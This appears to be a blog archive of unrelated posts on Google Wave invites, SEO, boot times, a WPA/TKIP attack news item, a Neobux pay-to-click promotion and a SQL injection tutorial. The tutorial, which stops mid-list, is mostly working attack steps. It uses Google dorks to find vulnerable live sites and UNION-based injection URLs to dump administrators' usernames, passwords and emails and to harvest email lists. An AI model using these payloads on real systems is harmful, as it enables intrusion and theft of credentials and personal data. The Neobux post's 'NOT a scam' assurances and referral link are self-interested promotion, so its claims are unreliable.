Who got these invitations? “developers who’ve been active in the developer preview started back in June, first users who signed up and offered to give feedback on wave.google.com, and select customers of Google Apps” (Google). Weren’t one of these select few? No worries, read on!

Recently I’ve was approved and given a Google Wave account by Google. Where can you apply? Go to wave.google.com, at the bottom of the page, you will see “Google Wave is currently in a limited preview”. There will be a link for you to apply, the rest is self explanatory.

Didn’t get approved or can’t stand the wait?

I’m giving out free Wave invites for a limited time, just leave a comment with your email and I’ll send you an invite.
What’s the catch? Simple, once you have an account, I’d appreciate if you leave another comment offering invites to the many other people looking for an account.

In short, SEO is the act of optimizing your website or websites to rank well in major search engines such as Google. When done well, SEO can bring you more traffic, more revenue, and allow your site to be more frequently crawled by their web spiders.
SEO is not only referred to as Search Engine Optimization, it is also referred to as Search Engine Optimizer (the person who is doing the optimizing).

How do I go about optimizing my website to rank better in search engines? Easy, grasp some simple concepts and you can be jumping up the search rankings in no time.

Original/Quality Content

This is one of the major variables to help you gain a better search ranking. Your content should be high quality, original, and worthy of being read. Any SEO is aware that the quality of your content is highly important and this can not be stressed enough.

Innovation/Creativity

Okay, this may not be as commonly executed but think about it this way. You’ve created such a “fresh” website that major tech news sites and webpage recognition sites just can’t stay away from talking about you. If done well, this can certainly bring you a substantial amount of backlinks.

Avoid query strings in URLs (Dynamic URLs)

Often people fail to notice the importance of limiting their URLs to something that looks static or “permanent” to search engines. Think of an URL as that specific content’s address on the internet. If major search engine are unable to have something permanent or long term to index, why would they bother? When creating a website, make sure you avoid links that contain query strings such as “php?id=123″. This shows that the content is randomly called on-the-fly from a database according to the query, thus the content is not static and would not be much of importance to search engines. To rewrite your URL into something more search-engine-friendly such as “/content/article-on-SEO”, enable the mod_rewrite setting or the rewrite_module to tell the server how to handle links. For more information on using the .htaccess file, try the articles over at http://www.askapache.com/htaccess/htaccess.html.

Keep flash content to a minimum

Many people who start to learn how to code websites come across websites designed in flash every once in a while. It is a common mistake for beginners to marvel at the beauty of flash webpages being interactive, full of movement and just breathtaking. If you choose to include flash content on your website, keep in mind that it is harmful to your SEO, and keep it to an absolute minimum. Flash content is not like html where you can add meta tags, its primary purpose is merely to enhance user experience.

Limiting the use of AJAX (if any)

Yes, everyone knows implementing AJAX technology helps enhance user experience. However, since AJAX is loaded dynamically, this means search engines are unable to index it. Another downfall of AJAX is that it does not reload the URL, any content a user may want to link to will not be shown as they viewed it, potentially causing frustration and decrease in traffic.

Never have empty alt tags

Web crawlers only crawl text, not images. Therefore if website ranking is of any importance to you, you should not be forgetting to include alt tags in any images. Alt tags are the only way for web crawlers to “read” your image. Alt tags should be descriptive, but not long. Try to keep any alt tags to a 4 words max. Also avoid using an image to show a large document unless you do not wish for it to be crawled.

Create relevant links

If you’ve been talking about an event or product everywhere in your article, and you say something like “Read more about it HERE”, we all know that HERE is about the product thus clicking on the link should lead us to more information about the product. However, computers are not humans, there is no such thing as “logic” in machine language, it’s “I’ve been coded to follow this format, so I do this. No questions asked”.  If you link to a product page with the word HERE, the web crawlers will attribute the content in that link with HERE, and of course, HERE itself tells us nothing at all. Always link to another page or site using 2 or 3 words that describe what is there or else you may be losing some valuable attention from search engines! =(

Frequently link to others and don’t hesitate to link within your site

You may be thinking, the more backlinks I have, the higher chance of an increase in my ranking. So maybe I should never link to other websites to prevent giving a higher ranking making it harder to rank well myself? Despite the logic, this will definitely not be beneficial to you. What your readers are seeking is probably information and news. If your site is unable to provide certain information not within your niche, you should allow your readers the freedom and benefit of exposing them to other information. The internet contains a great wealth of knowledge, if you refuse to allow your readers a convenient way of obtaining relevant information, they will do it themselves. Besides, linking to others is also a way of interactivity and who knows, maybe you’ll get to make some friends or partners that way.
It is also important to refer your readers to other pages on your site that they otherwise may not be easily exposed to. Often you’ll find that something you’re writing about is closely related to another post on your website, so why not tell them and allow your readers more knowledge? Internal linking is also helpful for web crawlers to crawl your site if your content is linked in a web-like manner, just don’t over do it.

Include a sitemap

Last of all, always remember to include a sitemap. Sitemaps basically show all the links on your website in a simple, yet organized manner. Having a sitemap can allow a web crawler to quickly and efficiently index your website and possibly index isolated pages that they might otherwise not find. There are a couple of sitemap generators that can be found online, if you do happen to get a sitemap for your site, don’t forget to notify Google Webmaster Tools of its presence!

Note: I have not discussed tags or keyword targetting in this article as they should only be considered after the points  above are well practiced.

Please report any errors or suggestions for improvement. Thank you!

Table of Contents

Introduction – Booting Process

Current Startup Issues

Future Innovations and Advancements

What You Can Do For Now

End Notes and Conclusion

Introduction – Booting Process

First of all let’s familiarize ourselves with how the computer boots up. It’s a very simple to understand process. When you first press out the power button, the computer goes through an initialization process. Firstly, it’s important to check if a CPU is present and functional. If there is an error related to the CPU, depending on your motherboard model, it your motherboard might make a beeping sound, flash the power light, start to smoke, or burst into flames (no biggie ). Usually, after this, if you have a multiple CPU configuration system, one CPU (CPU 0) is selected to run the BIOS and initialize the kernel (a central component of your operating system which will “turn on” the remaining CPUs). At startup, a CPU can only address 1MB of memory, but some Intel processors have a special configuration where they use the last 16 bytes of the memory.

Then the computer starts executing the BIOS code, and starts checking for present hardware (Power on self test). Usually when there is a hardware error, it will display a message on the screen and make a beeping sound. Most motherboards make a beeping sound because if your video card turns out to be not functional, how else can they convey the message to you? Many of the modern (post 1996) BIOSs can use Advanced Power Configuration and Power Interface (ACPI) to list devices the computer has, and then the kernel uses this information.

After the POST, the BIOS wants to find an operating system to boot. It will search through a list of devices in a user-configurable order (CD, Hard Drive, Floppy, USB flash drives, memory cards, etc.) otherwise it will present you an error that says “Non System Disk or Disk Error” which could indicate that the disk could not be boot from. This could mean the disk is not functioning (broken hard drive, scratched/bad CD, etc.) or a configuration error you have made. If a bootable device is found though, the BIOS will read sector 0, the first 512 byte sector of the disk (remember that sector n-1 is the last sector of the hard drive where n is the total amount of sectors on the drive). Important data is in there: a boot sector. It also contains a partition table, 64 bytes – 16 bytes per partition (That’s why you can’t create more than 4 partitions on a hard drive, you will have to use a logical partition).

Since the boot sector is so small (460 bytes of usable space), it will either 1) launch another boot sector, 2) launch a second stage boot loader (could be DOS loader, NTLDR, BCD, GRUB, Lilo, maybe some strange virus you got off some website you shouldn’t be visiting anyways, etc.), or 3) Directly launch the kernel and start the operating system. Either way, if configured correctly, your computer will be told where an operating system is located and a file that will start the kernel. Your operating system splash screen will appear and in a few moments you are ready to use your computer system!

Current Startup Issues

How many things can you do in the time it takes your computer to start up? This means from turning on, operating system loading, then to a point where everything is ready, and you’re ready to start your favourite application (If your login is password protected, don’t count that!). Make a coffee? Make your entire breakfast? Go to school/work and then come home to find out your computer has FINALLY started up? Computers, unlike some other electronics, aren’t in a ready state the moment you turn them on. For example, a television would be ready within a few seconds of you turning it on, a phone would be ready the instant you turn it on. Even your CD player, DVD player, or Blu-ray player would be almost instantly ready when you turn it on. Usually you’re only waiting for it to spin up the disc. The vast amount of resources a modern operating system requires, and the speed limitations of hard drives, processors, and other hardware aren’t appealing to users. Solid state drives are a possible solution, but remember that there are always new software advancements, too. As hardware advancements are being made, operating systems are also becoming more resource-crunching, we might have a lot of trouble dealing with operating system startup issues in the future.

Future Innovations and Advancements

Computer startup times have been a frustrating issue for many computer users. The bad news is that there hasn’t been a method to completely elimate the wait time during computer startup, but the good news is many computer manufacturers are finding solutions to this dilemma. Microsoft’s Windows Vista has been said to be a huge blunder in computing technology and has been one of the primary targets in Apple’s “Get a Mac” advertising campaign (Makes me wonder how they will target Windows 7 in the future). Windows 7 is said by many to be a vast improvement over Windows Vista, most notably in terms of performance, and one of the apparent things Microsoft has tacked is startup time. It’s finally about time, after decades of computing technology, that we are finding ways to cure startup issues.

A leading BIOS manufacturer, Phoenix BIOS has shaved the POST time to about a second. But that doesn’t really affect the time it takes your Windows operating system to start up. The American-based Chinese computer manufacturer Lenovo has tackled Windows starting times by taking advantage of Microsoft’s newest innovation; Windows 7. They have added the “Enhanced Experience” to many of their newer products, which claims they can slim down Windows 7 boot times by a whopping 56% times faster than XP or Vista. Such computers that have been optimized for this purpose will bear a sexy Windows 7 logo and a “Lenovo Enhanced Experience” sticker.

What You Can Do For Now

Remember it takes a while for us to invent an “instantly ready” computer system. Meanwhile, you can do many things to your computer that will chop your starting time down. All these features will work on modern operating systems, and will make a big impact no matter what your system specifications are.

1. Remove all unnecessary programs that start up when your computer starts up. There are many ways to do this and many tutorials on how to accomplish this. For example, on Windows go to Start > Run > msconfig and you will be presented with a list of services for you to disable. Make sure you are disabling unnecessary services, otherwise your computer will boot in safe mode because some essential services could not be started. You can do a web search of some necessary processes that you can remove (such as search indexing). When installing programs, remove the option to start up when your computer starts.
2. Do a complete scan of your computer for malware – viruses, adware, spyware, all need to be gone. Update your antivirus software frequently (turn on automatic updates if the feature is available).
3. Perform a disk defragmentation, disk cleanup, and remove all temporary files your browser stores.
4. Use the standby or hibernate mode on your computer. Standby uses minimal power (on desktops they use the +5 volt stand by) to suspend the memory to RAM (because RAM is volatile memory – it requires power to maintain stored information). Hibernate saves your session to your disk, and allows you to completely turn off your computer and/or unplug the power from your computer. When you turn on your computer, your session is resumed instantly (for stand-by) or after a while for hibernate because your computer has to load the data from the hard drive to the RAM.
5. Tweak your visual settings for performance. On Windows, right click My Computer, click the advanced tab, and click “Performance.” Remove the boxes out of some unnecessary features you don’t need. I leave Animate Windows, Show Window Contents While Dragging, Smooth Edges of Screen Fonts, Use Drop Shadows for Icon Labels on the Desktop, and Use Visual Styles On Windows and Buttons.

End Notes and Conclusion

There is a wealth of information on the internet, and it should be one of your sources for obtaining information on virtually any computer subject. There are rapid advancements in computers and one day, who knows – computers will have instant startup along with ease of use so everyone can use a computer and take advantage of its many features.

This content is written by Neon Zidane. The author accepts no liability whatsoever for the validity, accuracy, completeness, or quality of the content provided. Liability claims against the author relating to material or non-material damages, caused by the use or misuse of the information provided, or by the use of flawed or incomplete information are basically excluded. The author expressly reserves the right to modify, supplement, delete parts of this information or the without separate notification, or to end the publication in part of finally.

The attack gives hackers a way to read encrypted traffic sent between computers and certain types of routers that use the WPA (Wi-Fi Protected Access) encryption system. The attack was developed by Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University, who plan to discuss further details at a technical conference set for Sept. 25 in Hiroshima. Last November, security researchers first showed how WPA could be broken, but the Japanese researchers have taken the attack to a new level, according to Dragos Ruiu, organizer of the PacSec security conference where the first WPA hack was demonstrated. “They took this stuff which was fairly theoretical and they’ve made it much more practical,” he said.

The Japanese researchers discuss their attack in a paper presented at the Joint Workshop on Information Security, held in Kaohsiung, Taiwan earlier this month.
The earlier attack, developed by researchers Martin Beck and Erik Tews, worked on a smaller range of WPA devices and took between 12 and 15 minutes to work. Both attacks work only on WPA systems that use the Temporal Key Integrity Protocol (TKIP) algorithm. They do not work on newer WPA 2 devices or on WPA systems that use the stronger Advanced Encryption Standard (AES) algorithm.

The encryption systems used by wireless routers have a long history of security problems. The Wired Equivalent Privacy (WEP) system, introduced in 1997, was cracked just a few years later and is now considered to be completely insecure by security experts. WPA with TKIP “was developed as kind of an interim encryption method as Wi-Fi security was evolving several years ago,” said Kelly Davis-Felner, marketing director with the Wi-Fi Alliance, the industry group that certifies Wi-Fi devices. People should now use WPA 2, she said. Wi-Fi-certified products have had to support WPA 2 since March 2006. “There’s certainly a decent amount of WPA with TKIP out in the installed base today, but a better alternative has been out for a long time,” Davis-Felner said.

Enterprise Wi-Fi networks typically include security software that would detect the type of man-in-the-middle attack described by the Japanese researchers, said Robert Graham, CEO of Errata Security. But the development of the first really practical attack against WPA should give people a reason to dump WPA with TKIP, he said. “It’s not as bad as WEP, but it’s also certainly bad.”
Users can change from TKIP to AES encryption using the administrative interface on many WPA routers.

Contents At A Glance:

Introduction

What exactly does that mean?

What is a PTC website?

Okay, I understand. Please give me more information about Neobux.

Only 4 advertisements/4 cents a day?! No way I’m joining!

How much does it cost to rent referrals?

Can I lose money? How do I ensure I stay in profit?

Memberships

Are you sure Neobux isn’t a scam? Can you give me tips on how to tell if a PTC site is a scam?

What other great features does Neobux have that I should know about?

End Notes

Introduction

Today I will introduce you to one of the best Pay to Click websites on the internet, Neobux.

Neobux is a innovative PTC website that has already paid $11.5 million  to their members (at the time of this post). For the current total payout amount, refer to the image below.

What exactly does that mean?

Well , it indicates that Neobux is in fact, NOT a scam. They will not use you to click their advertisements, make money out of it, and not pay you like many of the PTC scams we see around today.

What is a PTC website?

You may be wondering what a PTC website is? Let’s start from the literal meaning. PTC is an acronym for Pay to Click, PTC websites allow advertisers to post their ads for a certain price (the price usually depends on the number of “views” or “impressions” the advertiser desires) and they give YOU, the user, a portion of the payment. Payments are usually around 1 cent per “impression” (everytime you view an ad, you are giving it one “impression”), some sites may pay more or less but it’s generally around 1 cent. The best part? Neobux is absolutely FREE to join. However, make sure you sign up for a Paypal, Alertpay, or Neteller account before you signup as your payment info is required upon registration.

Okay, I understand. Please give me more information about Neobux.

As a standard member (meaning you have not paid to upgrade your membership), you are given 4 advertisements every 24 hours (the time depends on when you first click your ads), and you are paid 1 cent or $0.01 for each advertisement you view. To be credited or paid to view an advertisement, you must click the ad on your “View Advertisements” page, click the red dot that shows up, and wait until the timer finishes and it says “$x has been credited to your account” near the top of the page. After you see this message, you can close the window and go click another advertisement.

Only 4 advertisements/4 cents a day?! No way I’m joining!

If that’s what you’re thinking right now,  don’t fret. Like I said in the beginning of this post, Neobux is an INNOVATIVE PTC website. Everyone is aware that 4 cents a day won’t be enough for ANYONE to live off of. This is why Neobux gives you extra ads a few times a day, at random times, and for a random amount of time. There are 3 possible types of ads that will show, the “normal” ads which you click 4 times a day (also worth $0.01), “extended exposure” ads which display for slightly longer (worth $0.015), and “mini exposure” ads which display for slightly shorter (worth $0.005). If you refresh the Neobux website a few times a day, you could easily get around 6 cents per day. Still not enough? This is where the big earnings come in. Neobux is the first PTC site to ever introduce referral renting. What does this mean? It’s like having people sign up under you, but instead, you rent existing members of Neobux for a certain amount of money. Depending on your membership, a certain amount will be credited to you everytime your referrals click an advertisement (for standard members, you gain 0.5 cents for every click your referrals make).

How much does it cost to rent referrals?

As a new member, Neobux gives you a discount for the first 2 rentals. For renting 3 referrals, you only have to pay $0.75 or 75 cents for a 30 day rental. After the first 2 rentals however, it’s 84 cents for 3 referrals. Usually the referrals will be standard members as the ratio between Standard to Golden (or higher) is over 2:1. What does this mean? It means for every member paying for a membership, there will at LEAST be 2 standard members. However, if you’re lucky enough to get a Golden member as your rented referral, you will be making more money. Why? It’s simple. Golden (or higher) members get 9 advertisements a day (which means if they click everyday, you will be gaining a minimum of 0.005*9*30=$1.35 extra ads excluded). You may be thinking, “wow, they can pay for almost twice of my 30 day rental?” Yes, you can easily be in profit by just getting one Golden member. However, since the Standard to Golden ratio is so high, it won’t be that easy to get a golden member as your referral.

Can I lose money? How do I ensure I stay in profit?

The answer is simple, you won’t lose money if you don’t put any money into Neobux to speed up the process. Since the money wasn’t yours to start with, you will NEVER be losing money if you don’t invest. However, you and I both know that you joined to make money right? In that case, I will share some simple tips with you to more or less ensure profit. Do NOT rent your first 3 referrals the instant you get $0.75 cents. Why not? Let’s say you rented your 3 referrals and now you have $0.00 in your Neobux main balance. If any of your referrals stop clicking for too long, you WILL be able to recycle them for another one for $0.08 because you will have clicked more ads during the time they haven’t clicked. However, you may not be able to renew the good clickers by the time your 30 days is up because you’ve spent too much. This means that you will have to risk losing money during your NEXT rental because all of your referrals are new and therefore, could be inactive members. In other words, DO NOT drain all your money in your balance if you’re going to rent referrals. Make some calculations and make sure you will have enough for any adjustments before you rent. This also applies to cashing out money to your Paypal, Alertpay, or Neteller.

Also, there is a number on the far right side of each referral  in your referral list (look under AVG). This number will assist you in determining when to recycle an inactive referral and in turn, maximize your profits and minimize expenses. Refer to the length of inactivity and the corresponding averages to determine whether or not to recycle.

Recycle ALL referrals that haven’t clicked:

1) For 3-4 days with an Average less than 1
2) For 5-6 days with an Average less than 1.2
3) For 7 or more days with an Average less than 2

Memberships

Neobux offers many different types of memberships. However, I will not be going into detail about them as  more information about memberships can be found on the Neobux site.
Basically, memberships are split into 4 main types (one which you is no longer available to new members), and a couple “transitions” in between.

There is Standard, Pioneer, Golden and  Ultimate.

Pioneer is a lifetime membership Neobux provided their members during the opening to thank them. Pioneer members have some discounts and slight advantages that Standard members don’t have, but it’s not too big of a difference.

Golden memberships are basically a BIG upgrade from Standard as every advertisement your referral views gives you 1 cent instead of the 0.5 cents Standard members get. Golden membership costs $90 per year (or 365 days).

Ultimate costs $890 (yea I know, wow…), gives you 15 advertisements a day and has many great features, and since almost everyone who has the money wants to upgrade to Ultimate, you can guess it’s pretty much worth it. For more information on Neobux memberships, please refer to the link at the top of this section.

Are you sure Neobux isn’t a scam? Can you give me tips on how to tell if a PTC site is a scam?

Yes, Neobux is NOT a scam. If you refer to the image provided near the top, it’ll show you how much they’ve already paid to their members and if you do a simple google search on them, you’ll see many testimonies and payment proofs. Now onto recognizing scam PTC sites that you most likely shouldn’t waste your time on. First of all, if the website does not have a forum, it most likely is a scam. If a PTC site does not have a forum for members to post and interact with each other, it’s most likely that they DON’T want members to interact, which suggests that they are a scam because members would stay unaware of any fellow members being scammed and not paid by the website. Another great way to determine whether a site is worth your time is doing a Google search. If you see a few testimonies, don’t be assured. Staff and friends of the website can pull that off easily. However, if you see countless proof of payments, testimonies, and tutorials, it’s most likely that the website is legitimate and will pay you. The main reason for this is simple, I’m sure you can guess the main reason for people writing tutorials and/or guides such as this one. It’s to help any new members that may need assistance getting familiar with a new environment (in our case, Neobux) and to not make any stupid or overlooked mistakes that people may have made during their membership. However, if a PTC site is not legitimate, it’s unlikely that you will find many tutorials on it because writing tutorials takes time and most of us unfortunately, DON’T get paid for it. Please note that the tips I’ve provided you are not guaranteed to identify PTC scam sites, but are highly effective nonetheless.

What other great features does Neobux have that I should know about?

One great feature I haven’t gotten around to mentioning is that Neobux has an instant payout system! What does that mean? It means exactly what it sounds like! Any money that you request to transfer from your Neobux main balance will be transferred into your Paypal, Alertpay, or Neteller account within a few minutes. This is different from many websites that need to take a few weeks to approve of your request then another few weeks to get the money to you, when you request payout from Neobux, you can use the money elsewhere almost instantly! I’m sure you’ll be as thankful as I am for this great feature.

End Notes

Well, this is finally the end of my post. I hope you found it informative and helpful. If you have any questions please feel free to post a comment or contact me. If you would like to sign up to this great PTC site, here’s the signup link: Register, and I hope you all have a great day!

© -§for3v3rforgott3n§-

UPDATE: Neobux has now changed the 3 referrals rental pack to 75 cents for standard members instead of 84 cents. Rental and extension prices are also dropped by 11%. This means that standard members like you and me no longer have to maintain a 2.0 or greater avg for rented referrals to stay in profit. Now we can easily make a substantial amount just from the money saved because of the discount. So what are you waiting for? Get clicking!

Introduction

Finding Vulnerable Sites

Getting Number of Columns

Getting MySQL Version

Getting Database Names

Getting Database User

Getting Table Names

Getting Column Names

LIMIT, What is it and why do I need to know how to use it?

End Notes

Introduction

First of all, if you find that I have written something that is wrong, please address it and I will fix it. I have written this tutorial solely for education purposes, do not contact me regarding anything along the lines of me publishing “full disclosure” information on internet security. I have written this in the hopes that it will not only help educate anyone who is interested in SQL injection, it may also help educate any website owners/coders who are unaware of the risks that they put their company/systems in when leaving a simple issue unattended. This tutorial was written by for3v3rforgott3n at http://for3v3rforgott3n.blogspot.com

Finding Vulnerable Sites

First you need to know what makes a site vulnerable to SQL injection before you can find and inject vulnerable sites.

The most common reason that a site is vulnerable to SQL injection attacks is because the owner/coder didn’t use the built in MySQL feature ‘mysql_real_escape_string()‘. The purpose of this function is to sanitize or remove special characters from an SQL query. The most common side-effect is the simple username/password exploit ‘ or ‘1′=’1. Most website administrators today use this function along with stripslashes() or addslashes() to further sanitize the data.

Well since I gave you a very basic reason for why certain sites are vulnerable, we will move on to finding some vulnerable sites to play with.

When talking about finding sites to inject you will hear the term “dork” a lot, what this refers to is a google search term targeted at finding vulnerable websites. A “google dork” uses the built in google functions inurl:, or allinurl: to search for websites that have certain strings in their URL or website address, an example of a google dork is: inurl:index.php?id=1, entering this string into the google search engine would return all of the sites in google’s cache with the string index.php?id=1 in their URL, Ex: http://www.example.com/index.php?id=1

Here is a list of “dorks” to use:

http://sql-injection-tools.blogspot.com/2009/06/dork-sqli-by-shafiq.html

Now that we know what a google dork is we can start finding vulnerable sites. To be vulnerable the site has to have a GET parameter in the URL: index.php?id=1, id=1 being the GET parameter which ‘gets’ the 1 ‘id’ from the SQL database(Understand? Good.)

So you are going to go to http://www.google.com,http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. To do this the most common way is to add a back-tick after one of the integers in the URL

Example: http://www.example.com/index.php?id=1′

Now there are many ways for a site to show you that it is vulnerable the most common are errors:

You have an error in your SQL SyntaxWarning: mysql_fetch_array():Warning: mysql_fetch_assoc():Warning: mysql_numrows():Warning: mysql_num_rows():Warning: mysql_result():Warning: mysql_preg_match():

If you receive any of these errors when you enter the ‘ after the number then chances are the site is vulnerable to SQL injection attacks to some extent, but that isn’t the only way to see if a site is vulnerable, the biggest overlooked error is when a main part of the site just simply disappears, such as a news article or a body of text on the main site. If this happens then it is likely that the site is vulnerable also.

Getting Number of Columns

After you find your vulnerable site the first step you need to take is to find the number of columns in the table that is in use. There are a couple of ways that people do this, personally I use the ORDER BY statement, there is also GROUP BY which accomplishes the same thing, but it’s just habit. A lot of people use the string +and+1=0+ before their queries, most of the time it is just a waste of time to type this out, the only time you need this is if you try ORDER BY 300– and you don’t receive an error, then you would add the and 1=0 to your query.

To find number of columns you start with ORDER BY 1, if it doesn’t error then you are good to go, sometimes you will get a syntax error when doing ORDER BY 1 that’s why it is important to start there, if you get the syntax error your best bet is to move on to another site. If you don’t get an error I always go to ORDER BY 300 or more to see if I will get an error there, sometimes you could go on for years and never get an error, there can’t be 300 or more columns in the database so you should always get an error. After getting the error on 300 it is up to you how you want to find the number of columns, personally I jump around out of habit I usually do something like this:

http://www.example.com/index.php?id=1 ORDER BY 1–

no error

http://www.example.com/index.php?id=1 ORDER BY 300–

error

http://www.example.com/index.php?id=1 ORDER BY 10–

error

http://www.example.com/index.php?id=1 ORDER BY 5–

no error

http://www.example.com/index.php?id=1 ORDER BY 6–

error

After this you know that your website has 5 columns because it errors on everything above ORDER BY 5, and doesn’t error on anything below ORDER BY 5.

Note on comments: Comments are not always necessary when injecting a website, although sometimes they are, by comments I am referring to the — at the end of the URL.

Possible comments to use are –, /*, /**/, or simply nothing at the end.

Getting MySQL Version

Now that we have the number of columns you are going to want to get the version of the database you are working on, this is an important step, because any version lower than 5 you will have to guess table names and column names. I don’t recommend working on a database lower than version 5 for beginners, you should get acquainted with SQL injection first. Before we can get the version you have to find a visible column number. This is where the injection part really starts. To do this you will use a SELECT statement and the UNION statement. Most people don’t understand that these are two completely different SQL statements, the reason you use UNION SELECT is because you are already SELECTing from the database when you are simply visiting the site.

For example: http://www.example.com/index.php?id=1

What this URL is telling the database is SELECT * FROM ‘tablenamehere’ WHERE id=’1′;

Now when we add UNION into that URL we are adding two SQL statements together. Since our example website has 5 columns this is what our query would look like:

http://www.example.com/index.php?id=1+UNION+SELECT+1,2,3,4,5–

The website should return normal after doing this, if it doesn’t and it tells you something like “Forbidden” or some other error, then the website doesn’t support union statements and you need to move on. If it doesn’t error then add a negative sign after the equal sign like this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5–

There is a reason for this, I’ve been asked many times why you do this, the reason is when you send this query to the database you are sending something like:

SELECT * FROM ‘tablenamehere’ WHERE id=’-1′ AND SELECT 1,2,3,4,5

There isn’t a -1 in the id column so the database will return a blank section of the page, but since we have our other SELECT statement in there it will return numbers back in the data’s place (so in short, the negative sign pretty much cleans out the content that isn’t valuable to us). Those are our visible columns. For our example we’ll say we got back the numbers 2 and 3 so these are the numbers that we can retrieve data from. To get our database version there are two ways, either @@version or version(). To use them do this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,@@version,3,4,5–

or

http://www.example.com/index.php?id=-1+UNION+SELECT+1,concat(version()),3,4,5–

If you get an error like “Illegal mix of coallations” when using @@version you simply have to convert it to latin from UTF8 like so:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5–

NOTE: Notice that we completely replace the number 2 with our query, something like union select 1,concat(version()),2,3,4,5– will not work.

If it worked you now know the version of the MySQL database in use. You will see something like 5.0.13-log, or 4.0.0.1-delta, there are countless versions and types but all we need to focus on is the first number if it 5 or higher then we are good to go, if it is 4 or lower, it is recommended for you to move on if you’re new to SQL injection.

Getting Database Names

I haven’t seen this covered on any papers on SQL injection so I will include it because it is an important part of SQL Injection. For novice SQL injectors ever started to inject a website then find no useful data such as usernames/passwords? Most likely because the current database in use for the site only holds data like news articles and the like. This is where getting the different database names is important. In versions of MySQL higher than 5 there will always be a database named ‘information_schema’ and most of the time a database named ‘test’, neither of these hold data that you will need to know, but yet the information_schema database is the reason that injection v5+ databases is so easy.

To get the list of databases do this:

http://www.example.com/index.php?id=-1+union+select+1,group_concat(schema_name),3,4,5+ from+information_schema.schemata–

Now where you saw the database version pop up earlier you will see the names of all of the different databases we will say for our example we got back something like this:

information_schema,exampledb,exampledb2,test

If you want to know what the database in use right now is, do this:

http://www.example.com/index.php?id=-1+union+select+1,concat(database()),3,4,5–

We’ll say we got back ‘exampledb‘.

From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:

Databases:

Tables:

Columns:

So that I can quickly copy and paste the information in. In my opinion this is a good habit to get into.

Getting Database User

Not really necessary but good to know. Use user():

http://www.example.com/index.php?id=-1+union+select+1,concat(user()),3,4,5–

Getting Table Names

I’m going to go a little more in-depth than most tutorials you’ll see on the internet here because they aren’t very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.

To get table names from the current database:

http://www.example.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()–

You will see a list of table names come out, for our example we will say we got:

news, images, ads, links

Wow that looks useful huh? That is information we can get from just looking at the website, so now it’s time to get tables from our other database we found earlier, ‘exampledb2‘. This is where your best friend the hex converter will come in handy. To get tables from selected databases you have to hex the name.

So we convert exampledb2 to 6578616d706c65646232. Always remember to add the 0x in front of the hexed name to tell the database that it is hex encoded and it need to decode it to get the right name. So our database name ends up being 0×6578616d706c65646232.

Online text-to-hex converters:

http://www.motobit.com/util/binary-file-to-sql-hexstring.asp

http://www.string-functions.com/string-hex.aspx

http://home2.paulschou.net/tools/xlate/

Now for the query:

http://www.example.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0×6578616d706c65646232–

Notice we changed ‘database()’ to our hexed database name ‘ 0×6578616d706c65646232‘

For our example we’ll say we got back:

newsletter, members, administrators

That’s the good stuff, normally you wouldn’t have found this information and just moved onto another site.

Getting Column Names

This is exactly like getting table names, you just change table_name to column_name and information_schema.tables to information_schema.columns:

http://www.example.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()–

That’s gonna give you every column name in the database but you most probably don’t want the columns for ‘exampledb‘ because there wasn’t any useful info in there. You want just the column names from ‘exampledb2‘ because there was member info and admin info in that database. So now you open your text-to-hex editor again and hex your database again so ‘exampledb2‘ becomes ‘0×6578616d706c65646232‘

http://www.example.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=0×6578616d706c65646232–

That will only return the column names from that selected database. We’ll say we got back:

email, username, password, first_name, last_name

If you remember the table names from exampledb2, which you should because you always paste into notepad right? You can get the administrator’s username, password, email address, and full name.

To get this you would do:

http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0×3a,password,0×3a,email,0×3a,first_name,0×3a,last_name)​,3,4,5 from exampledb2.administrators–

3a being the hex value for a colon ‘:’ so that you can easily separate the information. Sometimes this wont work though, sometimes you have to hex the databasename.tablename (not a lot but sometimes) so in that case it would be:

http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0×3a,password),3,4,5 from 0×6578616d706c656462322e61646d696e6973747261746f7273–

Which will then give you what you’re looking for.

LIMIT What is it and why do I need to know how to use it?

Ever found a database that is full of users/emails/anything else that you want but can’t get it all because the website just wont display them all in one go? Well, this is where you need the LIMIT statement.

For our example we will say we want the emails from the exampledb2.newsletter table, the only column in that table is ‘email’, it probably will never be that easy but hey this is an example right? There are 500 emails in this database and when we group_concat(email) from the database we only get back 20 results and 1 half cut-off like random.email@gma so how do we get the rest of the 480 emails? This is where your perseverance will come into play, if you want it that bad you would use the LIMIT statement to get them since we already got the first 20 results we’ll start at 21 to get the full email address that is cut off:

http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 21,9999999–

Note when using limit: You can’t use group_concat() it will error, drop the group and just use concat().

The 999999 can be any number higher than the row count in the database I just use that because I haven’t seen a database with that many rows, therefore it would be more than enough to cover all our data. You would do this increasing your first number by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 22,9999999–,limit 23,9999999–,limit 24,9999999–

Yes, it will take a long time to do this, there are tools used to dump databases though, most commonly used is SQLi Helper, but keep in mind that this tool is flawed too because it won’t increase the last number when limiting if needed. You can always code your own program to automate the task for you in php, perl, python, etc. Be creative! =)

End Notes

Well, that’s it. I do hope that I helped you. I know it was a long read for those of you that actually went through it all, but I think most of the people who read this will learn something new. On another note, although SQL injection and defacing websites can be fun, you need to know that it is illegal. Here are some things to keep in mind.

Hacking is covered under law Title 18: Crimes and Criminal Procedure:Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done.The Ten Commandments of Computer Ethics by the Computer Ethics Institute:

